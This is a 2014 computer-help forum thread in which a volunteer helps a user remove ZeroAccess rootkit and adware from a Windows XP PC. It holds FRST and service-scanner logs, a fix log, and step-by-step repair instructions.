    2014-05-03 18:36 - 2014-05-03 18:37 - 00000000 ____D () C:\Program Files\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\IDM
     
    ==================== One Month Modified Files and Folders =======
     
    2014-05-30 09:19 - 2014-05-30 07:29 - 00017945 _____ () C:\Documents and Settings\Gery\Desktop\FRST.txt
    2014-05-30 09:19 - 2014-05-30 07:29 - 00000000 ____D () C:\FRST
    2014-05-30 09:19 - 2013-11-18 00:09 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\uTorrent
    2014-05-30 09:19 - 2012-08-10 10:37 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Temp
    2014-05-30 09:17 - 2014-05-15 14:50 - 00931640 _____ (TENCENT) C:\WINDOWS\system32\TesSafe.sys
    2014-05-30 09:12 - 2013-11-21 20:15 - 00000000 _RSHD () C:\Documents and Settings\Gery\wbgpy
    2014-05-30 08:56 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\wc
    2014-05-30 08:41 - 2013-12-12 20:01 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2014-05-30 08:33 - 2012-08-14 23:22 - 00000974 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-220523388-1085031214-682003330-1003UA.job
    2014-05-30 08:33 - 2012-08-10 21:58 - 00458752 _____ () C:\WINDOWS\system32\config\ACEEvent.evt
    2014-05-30 07:49 - 2013-02-10 14:45 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\GarenaPlus
    2014-05-30 07:49 - 2012-08-14 23:34 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\GarenaMessenger
    2014-05-30 07:47 - 2013-10-09 17:41 - 00000000 ____D () C:\Program Files\Steam
    2014-05-30 07:45 - 2014-05-30 07:45 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\ESET
    2014-05-30 07:45 - 2014-05-29 19:30 - 00000000 ____D () C:\WINDOWS\LastGood.Tmp
    2014-05-30 07:44 - 2012-08-14 23:19 - 00000159 _____ () C:\WINDOWS\wiadebug.log
    2014-05-30 07:44 - 2012-08-14 23:19 - 00000049 _____ () C:\WINDOWS\wiaservc.log
    2014-05-30 07:44 - 2012-08-10 10:36 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2014-05-30 07:43 - 2014-05-28 17:31 - 00000241 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-05-30 07:43 - 2012-08-10 10:37 - 00000178 ___SH () C:\Documents and Settings\Gery\ntuser.ini
    2014-05-30 07:43 - 2012-08-10 10:37 - 00000000 ____D () C:\Documents and Settings\Gery
    2014-05-30 07:43 - 2012-08-10 10:36 - 00032560 _____ () C:\WINDOWS\SchedLgU.Txt
    2014-05-30 07:28 - 2014-05-30 07:28 - 01056256 _____ (Farbar) C:\Documents and Settings\Gery\Desktop\FRST.exe
    2014-05-30 05:33 - 2012-08-14 23:22 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-220523388-1085031214-682003330-1003Core.job
    2014-05-29 21:01 - 2014-05-29 21:00 - 00688992 _____ (Swearware) C:\Documents and Settings\Gery\Desktop\dds.com
    2014-05-29 19:41 - 2014-05-29 19:30 - 00005809 _____ () C:\WINDOWS\setupapi.log
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\ESET
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\ESET
    2014-05-29 19:31 - 2014-05-29 19:31 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Program Files\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ESET
    2014-05-29 18:16 - 2001-08-23 18:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
    2014-05-29 18:07 - 2014-05-15 17:00 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0001.dat
    2014-05-29 18:06 - 2014-05-15 16:45 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0006.dat
    2014-05-29 17:54 - 2014-05-29 13:00 - 00000600 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\PUTTY.RND
    2014-05-29 17:48 - 2014-05-15 21:56 - 00002175 _____ () C:\Documents and Settings\All Users\Desktop\China English Patch.lnk
    2014-05-29 17:47 - 2012-08-14 21:06 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\vlc
    2014-05-29 16:08 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Application Data\wyUpdate AU
    2014-05-29 16:07 - 2014-05-27 17:20 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯软件
    2014-05-29 16:07 - 2014-05-15 14:52 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Tencent
    2014-05-29 16:03 - 2012-08-14 21:02 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\DMCache
    2014-05-28 23:48 - 2012-08-10 21:35 - 00000000 __SHD () C:\WINDOWS\CSC
    2014-05-28 22:03 - 2014-05-28 22:03 - 00329096 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-05-28 22:03 - 2014-05-22 10:04 - 00000000 ____D () C:\Program Files\sizlsearch
    2014-05-28 17:24 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Local Settings\Application Data\icsxml
    2014-05-28 16:08 - 2014-05-28 16:08 - 00088336 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000038 ___SH () C:\Documents and Settings\Gery\Local Settings\Application Data\1754111884ee9ab5277ca00.95260103
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000712 _____ () C:\Documents and Settings\All Users\Desktop\BattlePing.lnk
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Program Files\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\BattlePing
    2014-05-27 17:39 - 2014-05-15 14:52 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Tencent
    2014-05-27 17:20 - 2014-05-15 17:51 - 00000000 ____D () C:\Program Files\Common Files\Tencent
    2014-05-27 17:19 - 2014-05-27 17:19 - 00000000 ____D () C:\Program Files\Tencent
    2014-05-27 00:33 - 2012-08-14 23:21 - 00000000 __SHD () C:\Documents and Settings\Gery\UserData
    2014-05-27 00:30 - 2012-08-14 23:12 - 00096768 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2014-05-26 11:13 - 2013-11-11 16:41 - 00004096 _____ () C:\WINDOWS\system32\crash
    2014-05-25 10:50 - 2001-08-23 18:00 - 00000585 _____ () C:\WINDOWS\win.ini
    2014-05-24 22:12 - 2013-02-07 01:43 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Media Player Classic
    2014-05-24 22:11 - 2012-09-10 16:10 - 00000000 ____D () C:\WINDOWS\system32\LogFiles
    2014-05-23 11:06 - 2013-02-23 19:16 - 00000716 _____ () C:\Documents and Settings\All Users\Start Menu\LINE.lnk
    2014-05-23 11:06 - 2013-02-23 19:16 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LINE
    2014-05-22 14:39 - 2012-08-14 23:30 - 00002273 _____ () C:\Documents and Settings\Gery\Desktop\Google Chrome.lnk
    2014-05-22 11:35 - 2012-08-10 10:36 - 00000000 __SHD () C:\Documents and Settings\LocalService
    2014-05-16 15:59 - 2014-05-16 15:59 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\17173
    2014-05-16 09:41 - 2014-05-16 09:41 - 00000000 ____D () C:\WINDOWS\system32\mssymbols
    2014-05-15 21:58 - 2014-05-15 21:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LokiReborn
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000732 _____ () C:\Documents and Settings\Gery\Desktop\剑灵_腾讯.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯游戏
    2014-05-15 20:37 - 2012-08-10 10:28 - 00000000 ____D () C:\WINDOWS\system32\DirectX
    2014-05-15 20:02 - 2014-04-06 21:45 - 00002347 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Reader XI.lnk
    2014-05-15 20:01 - 2014-04-06 21:43 - 00000000 ____D () C:\Program Files\Common Files\Adobe
    2014-05-15 19:46 - 2012-08-31 03:31 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
    2014-05-15 19:30 - 2012-08-10 17:09 - 00000000 ___RD () C:\WINDOWS\Web
    2014-05-15 19:30 - 2012-08-10 17:09 - 00000000 ____D () C:\WINDOWS\Help
    2014-05-15 19:25 - 2001-08-23 18:00 - 00000250 _____ () C:\WINDOWS\system.ini
    2014-05-15 18:47 - 2014-05-15 18:47 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Microsoft AppLocale
    2014-05-15 17:01 - 2014-05-15 17:01 - 00000000 ____D () C:\Documents and Settings\All Users\Tencent
    2014-05-15 16:33 - 2014-05-15 16:33 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-05-15 14:51 - 2014-05-15 14:51 - 00000000 ____D () C:\Documents and Settings\Gery\My Documents\BnS
    2014-05-15 14:39 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\Downloaded Installations
    2014-05-15 14:36 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\ÌÚѶÓÎÏ·
    2014-05-15 13:43 - 2012-08-31 03:34 - 00692400 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
    2014-05-15 13:43 - 2012-08-31 03:34 - 00070832 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
    2014-05-15 12:51 - 2014-05-15 12:51 - 00000831 _____ () C:\Documents and Settings\Gery\Start Menu\µTorrent.lnk
    2014-05-15 12:51 - 2013-11-18 00:10 - 00000831 _____ () C:\Documents and Settings\Gery\Desktop\µTorrent.lnk
    2014-05-09 23:04 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\IDM
    2014-05-06 16:40 - 2014-05-22 11:35 - 00055232 _____ (StdLib) C:\WINDOWS\system32\Drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    2014-05-03 18:37 - 2014-05-03 18:36 - 00000000 ____D () C:\Program Files\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\IDM
    ZeroAccess:
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install
    ZeroAccess:
    C:\Program Files\Google\Desktop\Install
     
    ZeroAccess:
    C:\Windows\assembly\GAC\Desktop.ini
     
    Some content of TEMP:
    ====================
    C:\Documents and Settings\Gery\Local Settings\Temp\avgnt.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\ID_140513to140529.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\InstHelper.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\jre-7u60-windows-i586-iftw.exe
     
     
    ==================== Bamital & volsnap Check =================
     
    C:\WINDOWS\explorer.exe => MD5 is legit
    C:\WINDOWS\system32\winlogon.exe => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
    C:\WINDOWS\system32\User32.dll => MD5 is legit
    C:\WINDOWS\system32\userinit.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit
     
    ==================== End Of Log ============================

    Attached Files


    Edited by trussardi15, 29 May 2014 - 09:36 PM.


    #6 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 29 May 2014 - 11:26 PM

    Hey bud! :clapping:

    Just want to tell you that I am going to away from my PC today, now is 11 AM so maybe I will be back tomorrow morning around 9-10 AM.

    See you tomorrow!

     

    Thanks

    Best Regards

    Aiven  :bubbles:



    #7 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 09:04 AM

    Hi,

     

    Let's start with this. Download the attached fixlist.txt to your desktop, run FRST again, and select the "Fix" button. Please post the resulting fixlog.txt.

     

    Next,
     

    Please download Farbar Service Scanner and run it on the computer with the issue.
    • Make sure the all of the options are checked:
     
    FSS.gif
     
    • Press "Scan".
    • It will create a log (FSS.txt) in the same directory the tool is run.
    • Please copy and paste the log to your reply.
     
     
    How is your computer running now?

    Attached Files


    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #8 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 30 May 2014 - 09:20 AM

    Hi bud! It looks like I came home earlier so we will start to fix my PC immediately.

    Here it is.

     

    FIXLOG

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:30-05-2014

    Ran by Gery at 2014-05-30 21:00:24 Run:1
    Running from C:\Documents and Settings\Gery\Desktop
    Boot Mode: Normal
     
    ==============================================
     
    Content of fixlist:
    *****************
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update*] => [X] <===== ATTENTION (ZeroAccess rootkit hidden path)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)
    C:\Documents and Settings\Gery\Application Data\4102C4
    BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    FF Extension: Bruowsee2save - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk [2013-04-01]
    FF HKLM\...\Firefox\Extensions: [OKitSpace@Vittalia.es] - C:\Documents and Settings\Gery\Application Data\okitspace\Firefox
    C:\Documents and Settings\Gery\Application Data\okitspace
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    S2 Update sizlsearch; "C:\Program Files\sizlsearch\updatesizlsearch.exe" [X]
    S2 Util sizlsearch; "C:\Program Files\sizlsearch\bin\utilsizlsearch.exe" [X]
    S2 *etadpug; "C:\Program Files\Google\Desktop\Install\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\   \   \???\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\GoogleUpdate.exe" < <==== ATTENTION (ZeroAccess)
    R1 {9d5747ee-0448-4681-8337-1555de75a3b6}Gt; C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys [55232 2014-05-06] (StdLib)
    S3 PCFApiUtil; \??\C:\Program Files\Baidu Security\PC Faster\3.7.0.0\PCFApiUtil.sys [X]
    C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    S3 BprotectEx; \??\C:\WINDOWS\System32\drivers\BprotectEx.sys [X]
    C:\WINDOWS\System32\drivers\BprotectEx.sys
    S3 EagleNT; \??\C:\DOCUME~1\Gery\LOCALS~1\Temp\EagleNT.sys [X]
    S3 EagleXNt; \??\C:\WINDOWS\system32\drivers\EagleXNt.sys [X]
    C:\Program Files\sizlsearch
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install
    C:\Program Files\Google\Desktop\Install
    C:\Windows\assembly\GAC\Desktop.ini
    File: C:\WINDOWS\system32\mssymbols
    File: C:\Documents and Settings\Gery\Application Data\17173
     
    cmd: netsh winsock reset
     
     
    *****************
     
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Google Update* => Value deleted successfully.
    HKU\HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)\Software\Microsoft\Windows\CurrentVersion\Run\\FLT => Value not found.
    C:\Documents and Settings\Gery\Application Data\4102C4 => Moved successfully.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670} => Key deleted successfully.
    HKCR\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670} => Key not found.
    Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
    Winsock: Catalog5 entry 000000000003\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
    C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk => Moved successfully.
    HKLM\Software\Mozilla\Firefox\Extensions\\OKitSpace@Vittalia.es => Value deleted successfully.
    "C:\Documents and Settings\Gery\Application Data\okitspace" => File/Directory not found.
    HKLM\SOFTWARE\Policies\Google => Key deleted successfully.
    Update sizlsearch => Service deleted successfully.
    Util sizlsearch => Service deleted successfully.
    *etadpug => Service deleted successfully.
    {9d5747ee-0448-4681-8337-1555de75a3b6}Gt => Unable to stop service
    {9d5747ee-0448-4681-8337-1555de75a3b6}Gt => Service deleted successfully.
    PCFApiUtil => Service deleted successfully.
    C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys => Moved successfully.
    BprotectEx => Service deleted successfully.
    "C:\WINDOWS\System32\drivers\BprotectEx.sys" => File/Directory not found.
    EagleNT => Service deleted successfully.
    EagleXNt => Service deleted successfully.
    C:\Program Files\sizlsearch => Moved successfully.
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install => Moved successfully.
     
    "C:\Program Files\Google\Desktop\Install" directory move:
     
    Could not move "C:\Program Files\Google\Desktop\Install" directory. => Scheduled to move on reboot.
     
    C:\Windows\assembly\GAC\Desktop.ini => Moved successfully.
     
    ========================= File: C:\WINDOWS\system32\mssymbols ========================
     
    MD5: 
    Creation and modification date: 2014-05-16 09:41 - 2014-05-16 09:41
    Size: 0000000
    Attributes: ----D
    Company Name: 
    Internal Name: 
    Original Name: 
    Product Name: 
    Description: 
    File Version: 
    Product Version: 
    Copyright: 
     
    ====== End Of File: ======
     
     
    ========================= File: C:\Documents and Settings\Gery\Application Data\17173 ========================
     
    MD5: 
    Creation and modification date: 2014-05-16 15:59 - 2014-05-16 15:59
    Size: 0000000
    Attributes: ----D
    Company Name: 
    Internal Name: 
    Original Name: 
    Product Name: 
    Description: 
    File Version: 
    Product Version: 
    Copyright: 
     
    ====== End Of File: ======
     
     
    =========  netsh winsock reset =========
     
    The following helper DLL cannot be loaded: IFMON.DLL.
    The following command was not found: winsock reset.
     
    ========= End of CMD: =========
     
     
    => Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-05-30 21:02:05)<=
     
    C:\Program Files\Google\Desktop\Install => Deleted successfully.
     
    ==== End of Fixlog ====
     
    FSS
    Farbar Service Scanner Version: 21-05-2014
    Ran by Gery (administrator) on 30-05-2014 at 21:04:15
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Google IP is accessible.
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
    sharedaccess Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to retrieve start type of sharedaccess. The value does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to retrieve ImagePath of sharedaccess. The value does not exist.
    Unable to retrieve ServiceDll of sharedaccess. The value does not exist.
    Checking LEGACY_sharedaccess: ATTENTION!=====> Unable to open LEGACY_sharedaccess\0000 registry key. The key does not exist.
     
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
    Srservice Service is not running. Checking service configuration:
    The start type of Srservice service is set to Disabled. The default start type is Auto.
    The ImagePath of Srservice service is OK.
    The ServiceDll of Srservice: "C:\WINDOWS\system32\srsvc.dll".
     
    sr Service is not running. Checking service configuration:
    The start type of sr service is set to Disabled. The default start type is Boot.
    The ImagePath of sr: "\SystemRoot\system32\DRIVERS\sr.sys".
     
     
    System Restore Disabled Policy: 
    ========================
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR"=DWORD:1
     
     
    Security Center:
    ============
     
    wscsvc Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
     
     
    Windows Update:
    ============
    wuauserv Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking LEGACY_wuauserv: ATTENTION!=====> Unable to open LEGACY_wuauserv\0000 registry key. The key does not exist.
     
    BITS Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking LEGACY_BITS: ATTENTION!=====> Unable to open LEGACY_BITS\0000 registry key. The key does not exist.
     
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
    Checking Start type of SharedAccess: ATTENTION!=====> Unable to retrieve start type of SharedAccess. The value does not exist.
    Checking ImagePath of SharedAccess: ATTENTION!=====> Unable to retrieve ImagePath of SharedAccess. The value does not exist.
    Checking ServiceDll of SharedAccess: ATTENTION!=====> Unable to retrieve ServiceDll of SharedAccess. The value does not exist.
    Checking Start type of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking ImagePath of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
     
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    (edit)
    sorry forgot to answer your question..
    WOW! Now the notifications or reports about that virus or malware are not showing anymore, and I can open my game that previously could not be opened.

    Edited by trussardi15, 30 May 2014 - 09:24 AM.


    #9 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 09:39 AM

    Glad it's working better, but we still have work to do.

     

    Step 1: Fix services.
     
    Download the ESET services repair tool, extract the file to your desktop.
    • Double-click ServicesRepair.exe.
    • If security notifications appear, click Continue or Run and then click Yes when asked if you want to proceed.
    • Once the tool has finished, you will be prompted to restart your computer. Click Yes to restart.
    • A log will be saved in the CCSupport folder the tool created on your desktop, please post the content in your next reply.
    • Also, please run Farbar's Service Scanner again and post a new log.
     
    Step 2: Run JRT.
     
    thisisujrt.gif  Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
     
    Step 3: Scan system files.
     
    We need to scan your computer with the Windows System File Checker:

    The sfc /scannow command (System File Checker) scans the integrity of all protected Windows system files and replaces corrupted, modified, or incorrect versions with the correct versions if possible.

    Note: Be aware that if you have modified your system files as in theming explorer/system files, running sfc /scannow will revert the system files such as explorer.exe back to it's default state.

    Note: Make the appropriate backups of your system files that you have modified for theming if you wish to save them before running sfc /scannow.

    For Windows XP:

    • Click on the Start button, then Run...
    • In the box that appears, type cmd and press Enter

    Next:

    • Copy and paste the following line of text into the black box:
      note: to paste, right-click in the black box and choose Paste

      sfc /scannow
    • Press Enter to run the command
      note: this scan may take a while to finish, and if SFC reports that it could not fix something, run the command again to see if it may be able to the next time. Sometimes it may take running the sfc /scannow command 3 or more times to completely fix everything that it is able to.
     
    Things I need in your next reply:

     

    • ESET Service Scanner log
    • New FSS log
    • JRT log
    • Was SFC able to repair any errors?
     

    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #10 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:09 AM

    Hi there bud! Here is the logs that you need.

     

    • ESET Service Scanner log

    Log Opened: 2014-05-30 @ 21:31:26

    21:31:26 - -----------------
    21:31:26 - | Begin Logging |
    21:31:26 - -----------------
    21:31:26 - Fix started on a WIN_XP X86 computer
    21:31:26 - Prep in progress.  Please Wait.
    21:31:30 - Prep complete
    21:31:30 - Repairing Services Now.  Please wait...
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\BITS.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\SharedAccess.sddl'
